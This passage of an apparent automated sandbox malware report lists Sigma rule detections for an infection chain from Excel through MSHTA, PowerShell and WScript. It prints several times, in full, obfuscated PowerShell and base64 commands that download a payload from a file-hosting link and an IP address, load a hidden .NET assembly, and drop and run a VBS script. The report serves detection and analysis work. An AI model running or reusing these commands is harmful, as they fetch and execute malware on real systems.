[System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", CommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmK

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3344, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3648, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe, ProcessId: 3884, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3du

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

